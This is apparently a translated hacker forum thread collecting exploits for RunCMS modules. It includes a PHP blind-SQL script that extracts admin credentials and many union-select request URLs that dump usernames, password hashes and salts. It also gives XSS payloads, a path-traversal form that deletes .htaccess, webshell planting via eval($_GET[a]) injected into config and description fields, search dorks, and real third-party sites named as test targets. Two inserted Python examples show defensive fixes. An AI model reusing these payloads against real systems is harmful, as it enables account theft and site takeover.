$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
$prefix="runcms";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=(int)str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
echo "md5 hash -> ";
$j=1;$password="";
while (!strstr($password,chr(0))){
for ($i=0; $i<=255; $i++){
if (in_array($i,$md5s)){
$executed_queries=array();
//original query: EXPLAIN ...
$executed_queries[0]="SELECT null FROM ".$prefix."_users WHERE 1=(IF((ASCII(SUBSTRING(pass,".$j.",1))=".$i."),1,999999)) AND rank=7 LIMIT 1";
$sql=urlencode(serialize($executed_queries));
$sql=str_replace("%22","%2522",$sql);//you know, urldecode()...
$data ="debug_show=show_queries";
$data.="&executed_queries=".$sql;
$data.="&sorted=1";
$packet ="POST ".$p."class/debug/debug_show.php HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
send($packet);
if (eregi("_users </td>",$html)){$password.=chr($i);echo chr($i); sleep(1); break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}
echo "\n";
echo "admin username -> ";
$j=1;$admin_user="";
while (!strstr($admin_user,chr(0))){
for ($i=0; $i<=255; $i++){
$executed_queries=array();
$executed_queries[0]="SELECT null FROM ".$prefix."_users WHERE 1=(IF((ASCII(SUBSTRING(uname,".$j.",1))=".$i."),1,999999)) AND rank=7 LIMIT 1";
$sql=urlencode(serialize($executed_queries));
$sql=str_replace("%22","%2522",$sql);
$data ="debug_show=show_queries";
$data.="&executed_queries=".$sql;
$data.="&sorted=1";
$packet ="POST ".$p."class/debug/debug_show.php HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
send($packet);
if (eregi("_users </td>",$html)){$admin_user.=chr($i);echo chr($i); sleep(1); break;}
}
if ($i==255) {die("Exploit failed...");}
$j++;
}
?>
original url: http://retrogod.altervista.org/runcms_152_sql.html
How to find out the version?
/index.php
<meta name="robots" content="index, follow" />
<meta name="generator" content=" RUNCMS 1.5.3 (build 20071016)" />
<meta name="keywords" content="enter your keywords here" />
<meta name="description" content="Enter your site description here" />
RunCMS Module Upload Center Delete File Vulnerability
version: latest -- 1.01
Showing list files Vulnerability
Vuln Code:
/folder.php
function listfiles() {
global $ucConfig, $xoopsUser, $_GET;
if (!$xoopsUser) {
header("Location:".XOOPS_URL."/whyregister.php");
}
else {
$foldername = $_GET['foldername'];
$userfoldername = $xoopsUser->getVar("uid");
$userfolderpath = "./cache/files/".$userfoldername;
$imgurl = XOOPS_URL."/modules/uc/cache/files/".$userfoldername."/".$foldername;
$imgpath = "./cache/files/".$userfoldername."/".$foldername;
$subfolderpath = $userfolderpath."/".$foldername;
$total = dir_stats($userfolderpath);
.....
Delete File Vulnerability
Vuln Code:
/folder.php
function deletefile() {
global $xoopsUser, $_POST;
$filename = $_POST['filename'];
$foldername = $_POST['foldername'];
$userfoldername = $xoopsUser->getVar("uid");
if ( @file_exists("./cache/files/".$userfoldername."/".$foldername."/".$filename) ) {
@unlink("./cache/files/".$userfoldername."/".$foldername."/".$filename);
redirect_header("folder.php?op=listfiles&foldername=".$foldername, 3, _MD_FILEDELETEOK);
}
}
<form action="folder.php" method="post"><td width="1%" nowrap><input type="hidden" name="op" value="deletefile" />
<input type="hidden" name="foldername" value="../../../../../" /><input type="hidden" name="filename" value=".htaccess" />
<input type="submit" class="button" value="Delete"></td></form>
ZAMUT ©
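An added example (not from this thread and not the Upload Center module's code) for the deletefile()/listfiles() post above. Both functions build `./cache/files/<uid>/<foldername>/<filename>` from the request and check only `file_exists()`, so `foldername=../../../../../` walks out of the user's directory. The function below builds the same path but confines it: it rejects `..` segments and absolute components outright, then normalises the result and verifies it still sits under `base/<uid>` (defence in depth, in case a future change lets a traversal segment through). The base directory and requests are constructed for the example; nothing is actually unlinked.

```python
"""Confine a user-supplied folder/file pair to that user's own upload directory.

Added example, not the Upload Center module's code. The base directory and the
requests below are constructed to mirror the deletefile() form in the post.
"""
import posixpath


class PathEscape(ValueError):
    """Raised when the resolved path would leave the caller's own directory."""


def safe_user_file(base_dir, uid, foldername, filename):
    """Return base_dir/<uid>/<foldername>/<filename>, or raise if it escapes base_dir/<uid>.

    Mirrors the path the module builds ("./cache/files/".$uid."/".$folder."/".$file)
    but adds the containment check that deletefile() and listfiles() lack.
    """
    if not isinstance(uid, int) or uid <= 0:
        raise ValueError("uid must be a positive integer")
    for part in (foldername, filename):
        if not part or "\x00" in part:
            raise ValueError("empty name or NUL byte")
        if ".." in part.split("/") or part.startswith("/"):
            raise PathEscape(part)          # reject traversal segments outright
    user_root = posixpath.normpath(posixpath.join(base_dir, str(uid)))
    candidate = posixpath.normpath(posixpath.join(user_root, foldername, filename))
    # Defence in depth: verify containment of the normalised path as well.
    if candidate != user_root and not candidate.startswith(user_root + "/"):
        raise PathEscape(candidate)
    return candidate


def handle_deletefile(base_dir, uid, form):
    """Server-side view of the POST shown above: returns the path that would be
    unlinked, or None when the request is rejected (no file is touched here)."""
    try:
        return safe_user_file(base_dir, uid,
                              form.get("foldername", ""), form.get("filename", ""))
    except ValueError:   # PathEscape is a ValueError too
        return None


BASE = "/srv/runcms/modules/uc/cache/files"   # constructed location

if __name__ == "__main__":
    print(handle_deletefile(BASE, 2, {"foldername": "docs", "filename": "report.pdf"}))
    print(handle_deletefile(BASE, 2, {"foldername": "../../../../../", "filename": ".htaccess"}))
```

`posixpath` is used deliberately so the result is the same on any host; on a real deployment you would additionally resolve symlinks (`os.path.realpath`) before the containment test, since a link inside the user's folder can point anywhere.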
Ded MustD!e
16.12.2008, 01:05
RunCMS Module eCal 2.4 Blind-SQL
Vulnerable product: Module eCal
Version: <= 2.4
Link: http://www.runcms.ru/modules/files/showfile.php?lid=95
Dork: "inurl:modules/ecal/"
Blind-SQL
The vulnerability is in the file localleve.php.
Vulnerable piece of code:
$query = $db->query("SELECT * FROM ".$db->prefix("ecal")." WHERE stamp >= \"$currentyear-$currentmonth-$currentday 00:00:00\" AND locationid =$lid AND valid ='yes' ORDER BY stamp");
$kat1 = $db->query("SELECT location FROM ".$db->prefix("ecal_location")." where lid=$lid");
Exploit:
true: /modules/ecal/localleve.php?lid=1+and+1=1
false: /modules/ecal/localleve.php?lid=1+and+1=2
Example:
true: http://www.necton.lv/modules/ecal/localleve.php?lid=1+and+substring(version(),1,1)=5
false: http://www.necton.lv/modules/ecal/localleve.php?lid=1+and+substring(version(),1,1)=4
Ded MustD!e
16.12.2008, 01:17
RunCMS Module eBlog 0.1 Blind-SQL
Vulnerable product: Module eBlog
Version: <= 0.1
Link: http://www.runcms.ru/modules/files/showfile.php?lid=165
Dork: "inurl:modules/eblog/"
Blind-SQL
The vulnerability is in the file index.php.
Vulnerable piece of code:
$result = $db->query("select cat_blogid from ".$db->prefix(eblog_cat)." where cat_id=$cat") or $eh->show("0013");
Exploit:
true: /modules/eblog/index.php?cat=1+and+1=1
false: /modules/eblog/index.php?cat=1+and+1=2
Example:
true: http://utahvalleyonline.com/ourplace/modules/eblog/index.php?cat=12+and+substring(version(),1,1)=5
false: http://utahvalleyonline.com/ourplace/modules/eblog/index.php?cat=12+and+substring(version(),1,1)=4
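An added example (not from this thread and not module code) covering the eCal and eBlog posts above, which share one defect: `$lid` / `$cat` are pasted into the query as text, so `1+and+1=1` versus `1+and+1=2` yields two different result sets and that difference is the oracle a blind injection reads. The code below reproduces that query shape against an in-memory SQLite table with constructed rows, beside the corrected form: validate the id as an unsigned integer and pass it as a bound parameter, so the probe never reaches the SQL parser at all. Table and column names follow the ecal_location query quoted in the post.

```python
"""The eCal/eBlog pattern: an id pasted into SQL as text, beside the parameterised form.

Added example, not module code. Uses an in-memory SQLite table whose rows are
constructed; the column names follow the ecal_location query quoted above.
"""
import re
import sqlite3


def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE ecal_location (lid INTEGER PRIMARY KEY, location TEXT)")
    con.executemany("INSERT INTO ecal_location VALUES (?, ?)",
                    [(1, "Riga"), (2, "Tallinn")])
    return con


def location_vulnerable(con, lid):
    """Mirrors `... where lid=$lid`: whatever arrives in the parameter becomes SQL."""
    return con.execute("SELECT location FROM ecal_location WHERE lid=%s" % lid).fetchall()


def parse_id(raw):
    """Accept only an unsigned decimal integer; anything else is rejected, not 'cleaned'."""
    if not isinstance(raw, str) or not re.fullmatch(r"[0-9]+", raw):
        raise ValueError("id must be a positive integer, got %r" % (raw,))
    return int(raw)


def location_safe(con, raw_lid):
    """Validate, then bind: the value can never be parsed as SQL."""
    lid = parse_id(raw_lid)
    return con.execute("SELECT location FROM ecal_location WHERE lid=?", (lid,)).fetchall()


def is_rejected(con, raw_lid):
    """True when the safe path refuses the input before any query runs."""
    try:
        location_safe(con, raw_lid)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    # The true/false pair from the post: the vulnerable query answers differently,
    # which is exactly the oracle a blind injection needs.
    print(location_vulnerable(db, "1 and 1=1"), location_vulnerable(db, "1 and 1=2"))
    print(location_safe(db, "1"), is_rejected(db, "1 and 1=2"))
```

`intval()` on the PHP side would also neutralise these particular probes, but validating and binding is the form that survives a later change of column type, which is why the example rejects rather than coerces.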
BlackSun
19.02.2009, 08:52
XtremGuestbook
Version: 1.2
Download: http://www.runcms.ru/modules/files/visit.php?lid=194
SQL-INJ
Vulnerable script: /modules/xtremuserguestbook/index1.php
Request: /modules/xtremuserguestbook/index1.php?gbid=2&op=Messageedit&idmsg=-1+union+select+1,uname,pwdsalt,pass,5,6,7+from+runcms_users
The gbid parameter is the id of the current user
Vulnerable piece of code:
I don't know what kind of joke this is; apparently there should have been a check for administrative rights here, but it turned out like this ..
$gbid = intval($HTTP_GET_VARS['gbid']);
if ($gbid != $xoopsUser->uid()) {
redirect_header(XOOPS_URL."/",3,_NOPERM);
}
switch($op) {
case "Messageedit":
Messageedit($HTTP_GET_VARS["idmsg"]);
break;
function Messageedit($idmsg) {
global $db, $xoopsModule, $myts, $gbid;
$result=$db->query("SELECT user_id,uname,url,email,title,message,note FROM ".$db->prefix("xtremuserguestbook")." WHERE xtremuserguestbook_id=$idmsg");
You can also delete \ edit \ etc. messages
Active XSS
The E-mail field is vulnerable
mymail@asdasd.ru'><script>alert()</script><'
Uploading a shell via the config
Requirement: the folder /modules/xtremuserguestbook/cache must have 777 permissions (I, for one, forgot to set them))
Vulnerable script: /modules/xtremuserguestbook/conf.php
Request: /modules/xtremuserguestbook/conf.php?gbid=2&op=Config
We use the field _XTUG_NBMSGBYPAGE - 10;eval($_GET[a]);//
and save the settings; they will be saved to cache/2.php
where 2 is our id
Vulnerable piece of code:
Just as in the SQL injection case, there is an incomprehensible check
$gbid = intval($HTTP_GET_VARS['gbid']);
if ($gbid != $xoopsUser->uid()) {
redirect_header(XOOPS_URL."/",3,_NOPERM);
}
function SaveConfig($unbmessage,$uallowbbcode,$uallowhtml,$uallowsmileys,$usendmail2webmaster,$umoderate,$ushowdisclaimer,$ushowlogo) {
global $db, $myts, $HTTP_POST_VARS, $gbid;
$fp=fopen("cache/".$gbid.".php","w");
fwrite($fp,'<?php
$uallowbbcode='.$uallowbbcode.';
$uallowhtml='.$uallowhtml.';
$uallowsmileys='.$uallowsmileys.';
$unbmsgbypage='.$unbmessage.';
$usendmail2webmaster='.$usendmail2webmaster.';
$umoderate='.$umoderate.';
$ushowdisclaimer='.$ushowdisclaimer.';
$ushowlogo='.$ushowlogo.';
?>');
fclose($fp);
redirect_header("index.php", 1, _UPDATED);
exit();
}
switch($op) {
case "Config":
Config();
break;
case "SaveConfig":
SaveConfig($nbmessage,$HTTP_POST_VARS["allowbbcode"],$HTTP_POST_VARS["allowhtml"],$HTTP_POST_VARS["allowsmileys"],$HTTP_POST_VARS["sendmail2webmaster"],$HTTP_POST_VARS["moderate"],$HTTP_POST_VARS["showdisclaimer"],$HTTP_POST_VARS["showlogo"]);
break;
}
"Конфиг" после запроса будет выглядеть примерно вот так:
<?php
$uallowbbcode=0;
$uallowhtml=0;
$uallowsmileys=0;
$unbmsgbypage=10;eval($_GET[a]);//;
$usendmail2webmaster=0;
$umoderate=0;
$ushowdisclaimer=0;
$ushowlogo=0;
?>
BlackSun
21.02.2009, 05:32
MyAnnonces
Version: 1.7
Download: http://www.runcms.ru/modules/files/visit.php?lid=94
SQL-INJ
Vulnerable script: addannonces.php
Request: /modules/MyAnnonces/addannonces.php?op=addindex&cid=-1+union+select+pass,2+from+runcms_users
Instead of pass, substitute uname and pwdsalt one at a time, since concat can't be used: the mega-haxor protection kicks in)
Vulnerable code fragment:
The vulnerability can only be exploited if at least one category exists.
switch($op) {
case "addindex":
addindex($cid);
break;
function addindex($cid) {
..............
list($numrows) = $db->fetch_row($db->query("select cid, title from ".$db->prefix("ann_categories").""));
if ($numrows>0) {
..............
$requete = $db->query("select title, affprix from ".$db->prefix("ann_categories")." where cid=".$cid."");
list($title, $affprix) = $db->fetch_row($requete);
SQL-INJ
Vulnerable script: annonces-p-f.php
Requirement: magic_quotes = off
Request: /modules/MyAnnonces/annonces-p-f.php?op=EnvAnn&lid='+union+select+uname,pwdsalt,pass+from+runcms_users%23
Vulnerable code fragment:
switch($op) {
case "EnvAnn":
EnvAnn($lid);
break;
...........
function EnvAnn($lid) {
...........
$result = $db->query("SELECT lid, title, type FROM ".$db->prefix("ann_annonces")." where lid='$lid'");
list($lid, $title, $type) = $db->fetch_row($result);
echo "<B><A HREF=\"index.php\">"._CLA_MAIN."</A> » "._CLA_SENDTO." $lid \"<B>$type : $title</B>\"
Request: /modules/MyAnnonces/annonces-p-f.php?op=MailAnn&yname=&ymail=&fname=&fmail=blacksun@xakep.ru&lid=-1+union+select+1,pass,uname,pwdsalt,5,6,7,8,9,10,11,12,13+from+runcms_users
An e-mail like the following arrives at the specified address:
Hello ,
thought that this advert might interest you and wanted to send it to you.
admin : dd94709528bb1c83d08f3088d4043f4742891f4f
153a
Price : 6 Ђ 7
Email address : http://localhost/runcms/modules/MyAnnonces/contact.php?lid=1
Telephone : 5
Town : 11
Country : 12
Other adverts are available in teh Classified Adverts section of Mysite
http://{SITE URL}/modules/MyAnnonces/
Vulnerable code fragment:
switch($op) {
case "MailAnn":
MailAnn($lid, $yname, $ymail, $fname, $fmail);
break;
............
function MailAnn($lid, $yname, $ymail, $fname, $fmail) {
global $xoopsConfig, $xoopsUser, $db, $monnaie, $ynprice, $myts, $meta;
$result = $db->query("SELECT lid, title, type, description, tel, price, typeprix, date, email, submitter, town, country, photo FROM ".$db->prefix("ann_annonces")." where lid=$lid");
You can also do without the e-mail being sent)
Request: /modules/MyAnnonces/annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uname,pwdsalt,5,6,7,8,9,10,11,12,13+from+runcms_users
Vulnerable code fragment:
switch($op) {
case "ImprAnn":
ImprAnn($lid);
break;
..............
function ImprAnn($lid) {
global $xoopsConfig, $db, $monnaie, $useroffset, $claday, $ynprice, $myts, $meta;
$currenttheme = getTheme();
$result = $db->query("SELECT lid, title, type, description, tel, price, typeprix, date, email, submitter, town, country, photo FROM ".$db->prefix("ann_annonces")." where lid=$lid");
Flooding your own / someone else's mailbox with names / passwords / the lot
Vulnerable script: contact.php
Requirement: magic_quotes = off
Request: /modules/MyAnnonces/contact.php?submit=1&id=-1'+union+select+'blacksun@xakep.ru',2,pass,uname,pwdsalt+from+runcms_users%23
Vulnerable code fragment:
if ($submit) {
include("header.php");
global $xoopsConfig, $db, $myts, $meta;
$result = $db->query("SELECT email, submitter, title, type, description FROM ".$db->prefix("ann_annonces")." WHERE lid = '$id'");
while(list($email, $submitter, $titre, $type, $description) = $db->fetch_row($result)) {
And at this point I got bored; there are plenty more scripts in this module and they are all full of holes... whoever wants to can finish the job.
BlackSun
21.02.2009, 06:25
BamaGalerie
Version: 3.0.1
Download: http://www.runcms.ru/modules/files/visit.php?lid=282
Path disclosure
/modules/bamagalerie3/makegoback.php?galerieConfig[page_type]=bama_page
/modules/bamagalerie3/navig_cat_show.php
/modules/bamagalerie3/include/copy_one_img.php?galerieConfig[page_type]=bama_page
^ and likewise half of the scripts in that same directory (include)
SQL-INJ
Vulnerable script: rateimg.php
Request: /modules/bamagalerie3/rateimg.php?id=-1+union+select+pass+from+runcms_users
Vulnerable code fragment:
if($HTTP_POST_VARS['submit']) {
.........
} else {
$result=$db->query("select titre from ".$db->prefix("bamagalerie3_img")." where id=$id");
------------------------------------------
MiniGal
Version: 0.51
Download: http://www.runcms.ru/modules/files/visit.php?lid=491
Stored XSS
Add comment > the name field is vulnerable: <script>alert()</script>
Shell upload from the module's admin panel:
Upload an image, then edit its Description: <?eval($_GET[a]);?>
The shell will be in the file mg2db_idatabase.php
BlackSun
21.02.2009, 12:27
RushteR> BlackSun: have you dug around in the myalbum module in runcms?
MyAlbum
Version: 1.0
Download: http://www.runcms.ru/modules/files/visit.php?lid=302
SQL-INJ
Vulnerable script: newcomment.php
Request: /modules/myalbum/newcomment.php?item_id=-1+union+select+pass+from+runcms_users%23
Vulnerable code fragment:
Practically the entire file
$q = "select l.title from ".$db->prefix("myalbum_photos")." l, ".$db->prefix("myalbum_text")." t where l.lid=$item_id and l.lid=t.lid and status>0";
$result=$db->query($q);
list($ltitle)=$db->fetch_row($result);
$subject = $ltitle;
Vulnerable script: photo.php
(I didn't finish off this injection, I'm having some kind of problems with the module...)
Request: /modules/myalbum/photo.php?lid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13%23
Vulnerable code fragment:
$q = "select l.lid, l.cid, l.title, l.ext, l.res_x, l.res_y, l.status, l.date, l.hits, l.rating, l.votes, l.comments, t.description from ".$db->prefix("myalbum_photos")." l, ".$db->prefix("myalbum_text")." t where l.lid=$lid and l.lid=t.lid and status>0";
$result=$db->query($q);
list($lid, $cid, $ltitle, $ext, $res_x, $res_y, $status, $time, $hits, $rating, $votes, $comments, $description)=$db->fetch_row($result);
Vulnerable script: ratephoto.php
Request: /modules/myalbum/ratephoto.php?lid=-1+union+select+pass+from+runcms_users
Vulnerable code fragment:
if($HTTP_POST_VARS['submit']) {
...............
} else {
..............
$result=$db->query("select title from ".$db->prefix("myalbum_photos")." where lid=$lid");
list($title) = $db->fetch_row($result);
Another unfinished injection, apparently due to a botched module install...
Vulnerable script: viewcat.php
Request: /modules/myalbum/viewcat.php?cid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12%23
Vulnerable code fragment:
$fullcountresult=$db->query("select count(*) from ".$db->prefix("myalbum_photos")." where cid=$cid and status>0");
list($numrows) = $db->fetch_row($fullcountresult);
if($numrows>0){
$q = "select l.lid, l.title, l.ext, l.res_x, l.res_y, l.status, l.date, l.hits, l.rating, l.votes, l.comments, t.description from ".$db->prefix("myalbum_photos")." l, ".$db->prefix("myalbum_text")." t where cid=$cid and l.lid=t.lid and status>0 order by $orderby";
$result=$db->query($q,$show,$min);
BlackSun
23.02.2009, 11:22
eBlog
Version: 0.3
Log in, create your own blog, add an entry...
Vulnerable script: blogentry.php
Request: blogentry.php?op=edit&text_id=-1+union+select+1,pass,pwdsalt,4+from+runcms_users+limit+0,1
Where the highlighted 1 is your blog's ID
Vulnerable code fragment:
if ($op == 'edit')
{
list($b_id, $title, $txt, $dt) = $db->fetch_row($db->query("select text_blogid, text_title, text_text, text_date from ".
$db->prefix("eblog_text")." where text_id=$text_id"));
if (!isSet($b_id) || $b_id != $blog_id)
{
echo $blog_id;
return;
}
if (!isSet($cats))
{
$result = $db->query("select tc_catid from ".$db->prefix("eblog_text_cat")." where tc_textid=$text_id");
$cats = array();
while ($myrow = $db->fetch_array($result)) { $cats += array($myrow['tc_catid']); }
}
eBlogMenu(array("index.php?blog_id=1" => _EBLOG_MY_BLOG,
"blogentry.php?op=add" => _EBLOG_ADD_ENTRY,
"blogadmin.php?op=edit" => _EBLOG_ADMIN,
"index.php?blog_id=-1" => _EBLOG_CHOOSE_BLOG,
"index.php" => _EBLOG_ALL_LATEST
)
);
showForm(_EBLOG_EDIT_ENTRY, $title, $txt, $all_cats, $cats, $text_id, "");
return;
}
Stored XSS
The blog name field is vulnerable
BlackSun
23.02.2009, 12:11
Event Calendar
Version: 2.4
Vulnerable script: display.php
Request: /modules/ecal/display.php?year1=&month1=&day1=&katid=-1+union+select+pass,2+from+runcms_users
Vulnerable code fragment:
if ($katid) {
$abfrage =" stamp >= \"$year1-$month1-$day1 00:00:00\" AND cid=$katid AND valid ='yes'";
$kat1 = $db->query("SELECT title, cid FROM ".$db->prefix("ecal_cat")." where cid=$katid");
list($kattitle) = $db->fetch_row($kat1);
Vulnerable script: localleve.php
Request: /modules/ecal/localleve.php?lid=-1+union+select+pass+from+runcms_users%23
Vulnerable code fragment:
$kat1 = $db->query("SELECT location FROM ".$db->prefix("ecal_location")." where lid=$lid");
list($loctitle) = $db->fetch_row($kat1);
Vulnerable script: location.php
Request: /modules/ecal/location.php?lid=-1+union+select+1,2,3,uname,5,pass,pwdsalt,8,9,10,11+from+runcms_users
Vulnerable code fragment:
$lid = $HTTP_GET_VARS['lid'];
$locat = $db->query("SELECT * FROM ".$db->prefix("ecal_location")." where lid=".$lid);
$location = $db->fetch_array($locat);
Vulnerable script: modifevent.php
Requirement: magic_quotes = off
Request: /modules/ecal/modifevent.php?id=-1'+union+select+1,2,uname,4,5,6,pass,pwdsalt,9,10,11,12,13,14+from+runcms_users%23
Vulnerable code fragment:
$query = $db->query("SELECT * FROM ".$db->prefix("ecal")." WHERE id = '$id' AND valid='yes'");
$row = $db->fetch_array($query);
Vulnerable script: remind.php
Request: /modules/ecal/remind.php?op=remindadd&id=-1+union+select+1,2,3,4,5,6,pass,8,9,10,11,12,13,14+from+runcms_users
Vulnerable code fragment:
$tid = $HTTP_GET_VARS['id'];
.......
$query = $db->query("SELECT * FROM ".$db->prefix("ecal")." WHERE id = $tid");
$row = $db->fetch_array($query);
Vulnerable script: teilnehmen.php
Request: /modules/ecal/teilnehmen.php?op=teiladd&id=-1+union+select+1,2,3,4,5,6,pass,8,9,10,11,12,13,14+from+runcms_users
Vulnerable code fragment:
$tid = $HTTP_GET_VARS['id'];
.......
$query = $db->query("SELECT * FROM ".$db->prefix("ecal")." WHERE id = $tid");
$row = $db->fetch_array($query);
BlackSun
23.02.2009, 13:04
Friendfinder
Version: 3.02
Vulnerable script: search.php
Request: /modules/friendfinder/search.php?page=search&search=search&agefrom=77&agetill=19+union+select+1,uname,pwdsalt,4,0x31322e31322e31393939,pass+from+runcms_users%23&sex=&partner=&state=&category=&sort=
Vulnerable code fragment:
if ($page == search) {
if ($search == search) {
/************************/
$g="SUBSTRING(birth,7)";
$m="SUBSTRING(birth,4,2)";
$d="LEFT(birth,2)";
$dat="CONCAT($g,'.',$m,'.',$d)";
/************************/
$sql = "SELECT id,user, city, state, birth, title FROM ".$db->prefix("friendfinder")."
inner join ".$db->prefix("friendfinder_state")."
on state = cid
WHERE (DATE_FORMAT(FROM_DAYS(TO_DAYS(NOW())-TO_DAYS($dat)), '%Y')+0) BETWEEN $agefrom AND $agetill AND partner='$sex' AND sex='$partner' AND state='$state' AND active='1' AND category='$category' ORDER BY '$sort'";
} else {
echo ""._TEXTSEARCHUNSUCCESSFUL."";
}
echo "<table border=0 cellpadding=5 cellspacing=0 align=center width=550><tr><td><font face=arial size=2>"._UNAME."</td><br><td><font face=arial size=2>"._TEXTREGION."</td><td><font face=arial size=2>"._CITY."</td><td><font face=arial size=2>"._TEXTAGE."</td></tr>";
$result = $db->query($sql);
while (list($id,$user,$city,$state,$birth,$title ) = $db->fetch_row($result))
{
Vulnerable script: view.php
Requirement: magic_quotes = off
Request: /modules/friendfinder/view.php?id=-1'+union+select+1,uname,3,4,5,pass,7,8,9,pwdsalt,11,12,13,14,0x31322e31322e31393939,16,17,19,20,21,22+from+runcms_users%23
Vulnerable code fragment:
if (isset($id) || $id != "")
{
$view = $db->query("SELECT id,user,active,sex,category,name,email,city,state,country,hobby,partner,height,weight,birth,pic,Description,imgname,imgtime,date, title FROM ".$db->prefix("friendfinder")."
inner join ".$db->prefix("friendfinder_state")." on state = cid WHERE id = '$id'");
while (list($id,$user,$active,$sex,$category,$name,$email,$city,$state,$country,$hobby,$partner,$height,$weight,$birth,$pic,$Description,$imgname,$imgtime,$date,$title ) = $db->fetch_row($view)) {
BlackSun
24.02.2009, 10:26
googlestats
Version: 2
Vulnerable script: info-robot.php
Request: /modules/googlestats/info-robot.php?robot=-1+union+select+1,2,pass,pwdsalt,5,uname,7,8,9,10+from+runcms_users
Vulnerable code fragment:
$descr = "descr_".$LANGUE;
$sql = "SELECT *";
$sql .= " FROM ".$TABLE_ROBOTS;
$sql .= " WHERE id=".$robot;
$res = mysql_query($sql) or erreurServeurMySQL($sql);
if ($enr = mysql_fetch_array($res))
Vulnerable script: index.php
Request: /modules/googlestats/index.php?rub=&robot=-1+union+select+pass+from+runcms_users%23&s=06&d=20090202
Vulnerable code fragment:
// index.php
if ( (getVar('rub') == 'bilan') || ($rub == '') )
{
bilan();
}
// ---------------------------------------------------------------------------
// rubrique PAGES
// ---------------------------------------------------------------------------
else if (getVar('rub') == 'pages')
{
pages();
}
............
// lib.php
// contenu
afficherPages($robot);
...........
// function afficherPages()
$sql = "SELECT url, max(date) AS 'lastdate', count(id) AS 'occurrence', ip, dns";
$sql .= " FROM ".$db->prefix("gs_log");
$sql .= " WHERE ".$sql_date;
$sql .= " AND robot=".$robot;
$sql .= " GROUP BY url";
$sql .= " ORDER BY ".$tri;
$res = mysql_query($sql) or erreurServeurMySQL($sql);
if (mysql_num_rows($res) == 0)
BlackSun
25.02.2009, 06:17
HotNews
Version: 2
Vulnerable script: rate.php
Request: /modules/HotNews/rate.php?tid=-1+union+select+1,pass+from+runcms_users
Vulnerable code fragment:
if($HTTP_POST_VARS['submit']) {
........
} else {
include(XOOPS_ROOT_PATH."/header.php");
OpenTable();
$result=$db->query("SELECT cid, tname FROM ".$db->prefix("HotNews")." WHERE tid=$tid");
list($cid, $tname) = $db->fetch_row($result);
Vulnerable script: index.php
Request: /modules/HotNews/?op=viewexttutorial&tid=-1+union+select+pass+from+runcms_users
Vulnerable code fragment:
switch($op) {
case "viewexttutorial":
viewexttutorial();
break;
...........
function viewexttutorial() {
global $db, $xoopsTheme, $HTTP_GET_VARS, $framebrowse;
include(XOOPS_ROOT_PATH."/header.php");
$tid = $HTTP_GET_VARS['tid'];
$db->query("update ".$db->prefix("HotNews")." set hits=hits+1 where tid=$tid ");
OpenTable();
$result = $db->query("select tlink from ".$db->prefix("HotNews")." where tid=$tid ");
list($tlink) = $db->fetch_row($result);
Vulnerable script: index.php
Request: /modules/HotNews/?op=viewtutorial&tid=-1+union+select+1,2,uname,4,pass,6,7,8,9+from+runcms_users
Vulnerable code fragment:
case "viewtutorial":
viewtutorial();
break;
...........
function viewtutorial() {
global $xoopsConfig, $xoopsUser, $db, $xoopsTheme, $HTTP_GET_VARS, $myts, $content_visdefault, $content_default, $content_visualize, $imgwidth, $imgheight, $framebrowse;
include(XOOPS_ROOT_PATH."/header.php");
$tid = $HTTP_GET_VARS['tid'];
if ($HTTP_GET_VARS['page']) {
$page = $HTTP_GET_VARS['page'];
} else {
$db->query("update ".$db->prefix("HotNews")." set hits=hits+1 where tid=$tid ");
}
OpenTable();
$result = $db->query("select tid, cid, tname, timg, tcont, tauthor, codes, hits, submitter from ".$db->prefix("HotNews")." where tid=$tid ");
list($tid, $cid, $tname, $timg, $tcont, $tauthor, $codes, $hits, $submitter) = $db->fetch_row($result);
Vulnerable script: index.php
Request: /modules/HotNews/?op=listHotNews&cid=-1+union+select+1,pass,3+from+runcms_users
Vulnerable code fragment:
case "listHotNews":
listHotNews();
break;
........
function listHotNews() {
global $xoopsConfig, $xoopsUser, $db, $xoopsTheme, $myts, $category_visdefault, $category_visualize, $category_default, $columnset, $imgwidth, $imgheight;
global $tutorial_visdefault, $tutorial_visualize, $tutorial_default, $HTTP_GET_VARS, $framebrowse;
include(XOOPS_ROOT_PATH."/header.php");
$cid = $HTTP_GET_VARS['cid'];
$xcid = $cid;
OpenTable();
$result = $db->query("select scid, cname, cimg from ".$db->prefix("HotNews_categorys")." where cid=$cid");
list($scid, $cname, $cimg) = $db->fetch_row($result);
Vulnerable script: index.php
